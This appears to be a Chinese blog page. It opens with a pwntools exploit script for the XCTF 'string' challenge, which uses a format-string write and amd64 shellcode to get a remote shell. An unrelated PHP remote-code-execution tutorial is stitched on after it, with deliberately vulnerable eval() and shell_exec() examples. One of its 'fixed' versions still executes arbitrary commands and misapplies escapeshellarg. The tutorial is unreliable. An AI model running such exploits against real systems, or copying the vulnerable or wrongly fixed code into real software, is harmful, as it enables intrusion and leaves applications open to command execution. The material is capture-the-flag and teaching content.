xctf string

from pwn import *

#p = process('./string')
p = remote("220.249.52.133",37754)
p.recvuntil('secret[0] is ')
addr = int(p.recv(7),16)
log.sucess(hex(addr))
p.recvuntil("name be:\n")
p.sendline('test')
p.recvuntil('east or up?:\n')
p.sendline('east')
p.recvuntil(' leave(0)?:\n')
p.sendline('1')
p.recvuntil("'Give me an address'\n")
#gdb.attach(p,'b *0x400C43')
p.sendline(str(addr))
p.recvuntil('And, you wish is:\n')

#gdb.attach(p,'b *0x400C7E')
p.sendline('%085c%7$n')
p.recvuntil('I will help you! USE YOU SPELL')
p.sendline(asm(shellcraft.amd64.linux.sh(),arch="amd64"))
p.interactive()

 

### XCTF Web 类 PHP RCE 漏洞利用新手教程 #### 背景介绍 PHP远程代码执行(Remote Code Execution, RCE)漏洞通常允许攻击者通过特定输入在服务器上运行任意命令。这种类型的漏洞常见于未正确过滤用户输入的情况下调用了危险函数,例如 `eval()`、`assert()` 或反序列化操作等[^1]。 #### 常见的PHP RCE触发方式 以下是几种常见的PHP RCE触发机制及其原理: 1. **Eval 函数滥用** 当应用程序使用 `eval()` 来动态执行字符串形式的PHP代码时,如果该字符串来源于不可信的用户输入,则可能导致RCE漏洞的发生。例如: ```php <?php $input = $_GET['code']; eval($input); ?> ``` 上述代码片段中,任何传入到参数 `code` 的数据都会被当作PHP脚本执行[^2]。 2. **系统命令注入** 如果程序错误地将未经验证的数据传递给诸如 `exec()`, `shell_exec()`, `passthru()`, 和 `system()` 这样的函数,也可能引发类似的后果。 3. **对象反序列化问题** 反序列化的风险在于它可能恢复恶意构造的对象实例,从而操纵内部逻辑或者访问敏感资源。比如当开发者依赖自定义魔术方法(`__wakeup`, `__destruct`)来处理复杂状态转换的时候特别需要注意安全性设计缺陷带来的隐患。 #### 解决方案与防护措施建议 为了防止此类安全事件发生,在开发过程中应该遵循最佳实践原则并采取必要的防御手段: - 避免完全信任来自外部环境的信息流; - 对所有进入系统的变量实施严格的白名单校验策略而非黑名单排除法; - 替代高危内置功能以更稳健的方式实现相同业务需求; - 定期审查现有架构是否存在潜在弱点并通过单元测试加以确认其健壮程度。 #### 示例代码分析 下面给出一段可能存在安全隐患的实际应用例子以及如何修复它的办法: 假设有一个简单的留言板服务端接口如下所示: ```php <?php if(isset($_POST["cmd"])){ shell_exec($_POST["cmd"]); } ?> ``` 这段原始版本很容易遭受非法操控因为直接把客户端提交过来的内容作为操作系统指令去执行没有任何保护机制存在其中。我们可以通过修改后的版本展示改进之处: 修正版一:采用预定义选项列表限制可选动作范围 ```php <?php $allowed_commands=['ls','-la','pwd'];//仅允许列举目录结构查看当前路径两项基本查询行为 $input=trim(filter_input(INPUT_POST,'cmd',FILTER_SANITIZE_STRING)); if(in_array($input,$allowed_commands)){ echo shell_exec($input); }else{ die('Invalid Command'); } ?> ``` 修正版二:运用正则表达式匹配限定字符集构成合法请求模式 ```php <?php $pattern='/^[a-zA-Z0-9\s]+$/'; //只接受字母数字空白符组成的简单语句 $input=filter_input(INPUT_POST,'cmd',FILTER_DEFAULT); if(preg_match($pattern,$input)){ echo escapeshellarg(shell_exec($input)); } else { die('Malformed Input Detected!'); } ?> ``` 以上两种不同的改写方向均能有效降低原生脆弱性的暴露概率同时兼顾功能性保留部分必要交互能力满足实际场景下的平衡考量。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值